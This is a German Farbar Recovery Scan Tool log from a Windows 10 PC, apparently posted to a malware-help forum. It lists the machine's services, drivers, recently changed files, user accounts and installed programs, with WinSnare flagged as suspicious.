FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-12-29] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)

Chrome: 
=======
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 Bonjour Service; C:\Program Files (x86)\Bonjour\mDNSResponder.exe [229376 2006-02-28] (Apple Computer, Inc.) [Datei ist nicht signiert]
S3 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2016-09-03] (Macrovision Europe Ltd.) [Datei ist nicht signiert]
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-01-20] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-01-20] (NVIDIA Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [458176 2016-12-29] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2017-01-20] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2142728 2016-10-22] (Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [2209296 2016-10-22] (Electronic Arts)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2889896 2016-09-15] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77416 2017-01-20] ()
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [176584 2017-02-13] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [110536 2017-02-13] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-02-13] (Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251848 2017-02-13] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [91584 2017-02-13] (Malwarebytes)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispiwu.inf_amd64_b67dc924fff8de6d\nvlddmkm.sys [14199224 2017-01-04] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2017-01-20] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [46016 2017-01-20] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-01-20] (NVIDIA Corporation)
R2 Sentinel64; C:\WINDOWS\System32\Drivers\Sentinel64.sys [145448 2009-09-17] (SafeNet, Inc.)
S3 SNTUSB64; C:\WINDOWS\System32\drivers\SNTUSB64.SYS [63528 2011-05-27] (SafeNet, Inc.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
U3 idsvc; kein ImagePath

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-02-13 21:25 - 2017-02-13 21:25 - 00000000 ____D C:\Users\Barbara\AppData\Local\Chromium
2017-02-13 20:47 - 2017-02-13 20:47 - 00018791 _____ C:\Users\Barbara\Desktop\mbam.txt
2017-02-13 20:42 - 2017-02-13 21:24 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-02-13 20:42 - 2017-02-13 21:24 - 00110536 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-02-13 20:42 - 2017-02-13 21:24 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-02-13 20:42 - 2017-02-13 21:24 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-02-13 20:42 - 2017-02-13 20:42 - 00176584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-02-13 20:42 - 2017-02-13 20:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-02-13 20:42 - 2017-02-13 20:42 - 00000000 ____D C:\Program Files\Malwarebytes
2017-02-13 20:42 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-02-13 20:41 - 2017-02-13 21:22 - 00000000 ____D C:\Users\Barbara\Desktop\alt
2017-02-13 20:41 - 2017-02-13 20:41 - 00019083 _____ C:\Users\Barbara\Desktop\AdwCleaner[C0].txt
2017-02-13 20:14 - 2017-02-13 20:38 - 00000000 ____D C:\AdwCleaner
2017-02-13 19:59 - 2017-02-13 19:59 - 07097928 _____ (VS Revo Group ) C:\Users\Barbara\Desktop\revo202setup.exe
2017-02-13 19:59 - 2017-02-13 19:59 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-02-13 19:59 - 2017-02-13 19:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-02-13 19:59 - 2017-02-13 19:59 - 00000000 ____D C:\Program Files\VS Revo Group
2017-02-13 19:08 - 2017-02-13 20:42 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-02-13 19:07 - 2017-02-13 21:28 - 00000000 ____D C:\FRST
2017-02-13 19:06 - 2017-02-13 21:28 - 00000000 ____D C:\Users\Barbara\Desktop\Virenscanner etc
2017-02-11 17:30 - 2017-02-11 17:30 - 11617413 _____ C:\Users\Barbara\Downloads\ColorSplash (1).themepack
2017-02-11 17:29 - 2017-02-11 17:29 - 11617413 _____ C:\Users\Barbara\Downloads\ColorSplash.themepack
2017-02-11 17:29 - 2017-02-11 17:29 - 08635521 _____ C:\Users\Barbara\Downloads\DreamgardenChristinaManchenko.themepack
2017-02-09 13:38 - 2017-02-12 20:33 - 00000000 ____D C:\WINDOWS\LastGood
2017-02-09 13:38 - 2017-02-09 13:38 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-02-09 13:38 - 2017-01-04 15:24 - 00222648 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-02-09 13:38 - 2016-12-29 13:43 - 00133056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-02-09 13:38 - 2016-09-09 19:25 - 00269600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-02-09 13:38 - 2016-09-09 19:25 - 00261920 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-02-09 13:38 - 2016-09-09 19:25 - 00110880 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-02-09 13:38 - 2016-09-09 19:24 - 00125216 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-02-03 17:19 - 2017-02-03 17:19 - 00515204 _____ C:\WINDOWS\Minidump\020317-6328-01.dmp
2017-02-03 17:12 - 2017-02-03 17:12 - 00004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2017-02-03 17:12 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-02-03 17:12 - 2017-01-20 19:39 - 00156608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-02-03 17:12 - 2017-01-20 19:39 - 00124352 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-02-03 17:12 - 2017-01-20 19:39 - 00057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-02-03 17:12 - 2017-01-20 14:36 - 00001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-01-26 18:15 - 2017-02-13 19:12 - 00001308 _____ C:\Users\Public\Desktop\ElsterFormular.lnk
2017-01-26 18:15 - 2017-01-26 18:17 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\elsterformular
2017-01-26 18:15 - 2017-01-26 18:17 - 00000000 ____D C:\ProgramData\elsterformular
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\Program Files (x86)\ElsterFormular Update Service
2017-01-26 18:15 - 2017-01-26 18:15 - 00000000 ____D C:\Program Files (x86)\ElsterFormular
2017-01-26 18:13 - 2017-01-26 18:15 - 67816592 _____ (Landesfinanzdirektion Thüringen) C:\Users\Barbara\Downloads\ElsterFormularPrivat.exe
2017-01-25 13:39 - 2016-12-21 08:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2017-01-25 13:39 - 2016-12-21 05:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-02-13 21:25 - 2016-09-23 02:40 - 00000000 ____D C:\ProgramData\NVIDIA
2017-02-13 21:24 - 2016-09-23 02:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-02-13 21:24 - 2016-07-16 07:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-02-13 20:52 - 2016-09-23 02:41 - 02401366 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-02-13 20:52 - 2016-07-16 23:51 - 00954884 _____ C:\WINDOWS\system32\perfh007.dat
2017-02-13 20:52 - 2016-07-16 23:51 - 00230936 _____ C:\WINDOWS\system32\perfc007.dat
2017-02-13 20:38 - 2016-11-25 17:30 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-02-13 20:38 - 2016-07-30 09:24 - 00000000 ____D C:\Users\Barbara\AppData\Local\CrashDumps
2017-02-13 20:36 - 2016-09-23 02:40 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-02-13 20:13 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-02-13 19:15 - 2016-11-26 12:11 - 00000000 ____D C:\Users\Barbara\AppData\LocalLow\Mozilla
2017-02-13 19:13 - 2017-01-13 18:18 - 00002108 _____ C:\Users\Barbara\Desktop\Finanzplan 2017.lnk
2017-02-13 19:13 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\Performance
2017-02-13 19:12 - 2016-11-16 20:05 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-02-13 19:12 - 2016-09-23 02:43 - 00001519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-02-13 19:12 - 2016-09-03 11:33 - 00001301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CS3.lnk
2017-02-13 19:12 - 2016-09-03 11:33 - 00000970 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Stock Photos CS3.lnk
2017-02-13 19:12 - 2016-09-03 11:32 - 00001480 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe ExtendScript Toolkit 2.lnk
2017-02-13 19:12 - 2016-09-03 11:32 - 00000953 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Device Central CS3.lnk
2017-02-13 19:12 - 2016-09-03 11:32 - 00000890 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Bridge CS3.lnk
2017-02-13 19:12 - 2016-07-30 09:48 - 00001886 _____ C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
2017-02-13 19:12 - 2016-07-30 08:18 - 00002429 _____ C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-02-13 19:12 - 2016-07-30 08:18 - 00001047 _____ C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Optionale Features.lnk
2017-02-13 19:12 - 2016-07-16 12:43 - 00002437 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immersive Control Panel.lnk
2017-02-13 19:12 - 2016-07-16 12:43 - 00002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PrintDialog.lnk
2017-02-13 19:12 - 2016-07-16 12:42 - 00002325 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiracastView.lnk
2017-02-12 22:24 - 2016-09-23 02:41 - 00000000 ____D C:\Users\Barbara
2017-02-12 22:15 - 2016-07-30 11:41 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\NVIDIA
2017-02-12 22:13 - 2016-07-30 13:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Witcher 2
2017-02-12 22:13 - 2016-07-30 09:02 - 00002028 ____N C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk
2017-02-12 22:12 - 2016-07-30 09:48 - 00000000 ____D C:\Users\Barbara\AppData\Local\Spotify
2017-02-12 20:33 - 2016-07-30 09:47 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Spotify
2017-02-12 20:33 - 2016-07-16 12:45 - 00000000 ____D C:\WINDOWS\INF
2017-02-11 12:51 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-02-10 11:44 - 2016-07-16 12:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-02-09 13:39 - 2016-09-23 02:40 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2017-02-09 13:39 - 2016-07-30 09:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-02-09 13:38 - 2016-09-23 02:40 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2017-02-09 13:38 - 2016-09-23 02:40 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-02-09 13:38 - 2016-07-30 09:20 - 00000000 ____D C:\Users\Barbara\AppData\Local\NVIDIA Corporation
2017-02-03 17:19 - 2016-11-13 21:39 - 1291434677 _____ C:\WINDOWS\MEMORY.DMP
2017-02-03 17:19 - 2016-11-13 21:39 - 00000000 ____D C:\WINDOWS\Minidump
2017-02-03 17:19 - 2016-07-30 09:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-02-03 17:18 - 2016-07-30 10:12 - 00000000 ____D C:\ProgramData\Origin
2017-02-03 17:14 - 2016-07-30 09:57 - 00000000 ____D C:\Program Files (x86)\Steam
2017-02-03 17:13 - 2016-07-30 10:16 - 00000000 ____D C:\Users\Barbara\AppData\Local\Origin
2017-02-03 17:12 - 2016-10-13 07:34 - 00003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003884 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-07-30 09:19 - 00000000 ____D C:\Users\Barbara\AppData\Local\NVIDIA
2017-01-25 13:43 - 2016-07-16 12:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-01-21 11:40 - 2016-07-30 08:18 - 00000000 ___RD C:\Users\Barbara\OneDrive
2017-01-20 19:39 - 2016-10-13 07:34 - 01872320 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01464768 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 00120256 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 00046016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-09-02 15:48 - 2016-10-11 12:28 - 0000337 _____ () C:\Users\Barbara\AppData\Roaming\2E7BF6-326E-4870-B5B1-B11758EC2B1D.ini

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-02-09 13:37

==================== Ende von FRST.txt ============================

--- --- ---

addition.txt

Zitat:

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 12-02-2017
durchgeführt von Barbara (13-02-2017 21:29:00)
Gestartet von C:\Users\Barbara\Desktop\Virenscanner etc
Windows 10 Pro Version 1607 (X64) (2016-09-23 01:45:25)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

Administrator (S-1-5-21-1500252791-3377746768-789393517-500 - Administrator - Disabled)
Barbara (S-1-5-21-1500252791-3377746768-789393517-1000 - Administrator - Enabled) => C:\Users\Barbara
DefaultAccount (S-1-5-21-1500252791-3377746768-789393517-503 - Limited - Disabled)
Gast (S-1-5-21-1500252791-3377746768-789393517-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1500252791-3377746768-789393517-1002 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 15.023.20056 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Illustrator CS3 (HKLM-x32\...\Adobe_c015d5ef39552390a753ee735d16041) (Version: 13.0 - Adobe Systems Incorporated)
Ansel (Version: 368.81 - NVIDIA Corporation) Hidden
ARCHline 2015 15.0.1.239 (HKLM\...\{526F8F65-6A69-4683-AA88-42BB3321C625}_is1) (Version: - IT-Concept Software GmbH)
CCleaner (HKLM\...\CCleaner) (Version: 5.22 - Piriform)
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.0.2.18.20170123 - Landesfinanzdirektion Thüringen)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - )
Fliqlo Bildschirmschoner (HKLM-x32\...\Fliqlo) (Version: - )
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
LibreOffice 5.0.6.3 (HKLM-x32\...\{900D9036-4EDA-45EC-A095-E8AFB25D807A}) (Version: 5.0.6.3 - The Document Foundation)
Malwarebytes Version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Mein CEWE FOTOBUCH (HKLM-x32\...\Mein CEWE FOTOBUCH) (Version: 6.1.5 - CEWE Stiftung u Co. KGaA)
MFCDLL Shared Library - Retail Version (x32 Version: 6.0.8665.0 - Unknown) Hidden
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Mozilla Firefox 51.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 de)) (Version: 51.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1.6234 - Mozilla)
NVIDIA 3D Vision Controller-Treiber 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 376.53 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.3.0.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.3.0.95 - NVIDIA Corporation)
NVIDIA Grafiktreiber 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.53 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (Version: 3.3.0.95 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 2.3.5.0 - NVIDIA Corporation) Hidden
NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 9.12.1.43352 - Electronic Arts, Inc.)
PDF Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.87.529.2014 - Realtek)
Revo Uninstaller 2.0.2 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.2 - VS Revo Group, Ltd.)
Sentinel System Driver Installer 7.5.7 (HKLM-x32\...\{B281C7D1-C088-40E0-86EA-B2D9D7E0810A}) (Version: 7.5.7 - SafeNet, Inc.)
SHIELD Streaming (Version: 7.1.0351 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.3.0.95 - NVIDIA Corporation) Hidden
SketchUp 2016 (HKLM\...\{6ECFED2E-6329-484A-9B08-14ED7F2D65BE}) (Version: 16.1.1449 - Trimble Navigation Limited)
Spotify (HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Spotify) (Version: 1.0.45.186.g3b5036d6 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
The Witcher 2 Enhanced Edition Version 3.0 (HKLM-x32\...\The Witcher 2 Enhanced Edition_is1) (Version: 3.0 - CD Projekt RED)
VC User ATL71 RTL X86 --- (x32 Version: 1.0 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
WinRAR 5.31 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
WinSnare (HKLM-x32\...\{54A54A73-D8CF-4EBF-BEA7-AD6507ACE4C5}) (Version: 4.1.0 - WinSnare) <==== ACHTUNG

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {07D50CCA-2188-43A1-897B-EF2C5815E13F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-26] (Piriform Ltd)
Task: {08BC7C06-525E-43F2-B72E-DDCD9E7C4DD6} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe
